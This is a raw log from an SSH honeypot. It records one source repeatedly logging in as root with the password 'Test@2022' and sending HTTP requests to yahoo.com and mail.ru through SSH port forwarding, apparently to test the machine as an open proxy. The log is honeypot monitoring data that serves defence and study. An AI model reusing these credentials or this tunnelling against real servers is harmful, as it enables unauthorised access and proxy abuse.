{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.819088Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":8170,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8170","sensor":"my-vps","timestamp":"2025-08-31T03:48:57.960930Z","session":"ed9abd8da76f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.011287Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.062626Z","src_ip":"77.83.207.83","session":"ed9abd8da76f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6541,"dst_ip":"1.2.3.4","dst_port":22,"session":"d718dfa66006","protocol":"ssh","message":"New connection: 77.83.207.83:6541 (1.2.3.4:22) [session: d718dfa66006]","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.111768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.112435Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.163350Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.416113Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8364,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8364","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.467454Z","session":"d718dfa66006"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.518152Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":26098,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26098","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.661005Z","session":"d718dfa66006"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.711790Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":27631,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27631","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.852811Z","session":"d718dfa66006"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.903828Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:58.955063Z","src_ip":"77.83.207.83","session":"d718dfa66006"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6635,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac9b90ad27c2","protocol":"ssh","message":"New connection: 77.83.207.83:6635 (1.2.3.4:22) [session: ac9b90ad27c2]","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.005874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.016041Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.057856Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.316655Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29997,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29997","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.369649Z","session":"ac9b90ad27c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.422289Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":717,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:717","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.566239Z","session":"ac9b90ad27c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.618104Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":15341,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15341","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.762654Z","session":"ac9b90ad27c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.814678Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.867788Z","src_ip":"77.83.207.83","session":"ac9b90ad27c2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6712,"dst_ip":"1.2.3.4","dst_port":22,"session":"4acd07b790fa","protocol":"ssh","message":"New connection: 77.83.207.83:6712 (1.2.3.4:22) [session: 4acd07b790fa]","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.917572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.918504Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:59.969714Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.220825Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9528,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9528","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.272320Z","session":"4acd07b790fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.322781Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":20965,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20965","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.464634Z","session":"4acd07b790fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.514934Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":16812,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16812","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.656565Z","session":"4acd07b790fa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.707215Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.758095Z","src_ip":"77.83.207.83","session":"4acd07b790fa"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6801,"dst_ip":"1.2.3.4","dst_port":22,"session":"b35dbcaa60fc","protocol":"ssh","message":"New connection: 77.83.207.83:6801 (1.2.3.4:22) [session: b35dbcaa60fc]","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.806401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.816251Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:00.856539Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.105590Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31619,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31619","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.156556Z","session":"b35dbcaa60fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.207552Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":13085,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13085","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.348217Z","session":"b35dbcaa60fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.398561Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":30592,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:30592","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.540224Z","session":"b35dbcaa60fc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.590618Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.641782Z","src_ip":"77.83.207.83","session":"b35dbcaa60fc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":6895,"dst_ip":"1.2.3.4","dst_port":22,"session":"a28af30ca32e","protocol":"ssh","message":"New connection: 77.83.207.83:6895 (1.2.3.4:22) [session: a28af30ca32e]","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.690590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.691339Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:01.741534Z","src_ip":"77.83.207.83","session":"a28af30ca32e"}
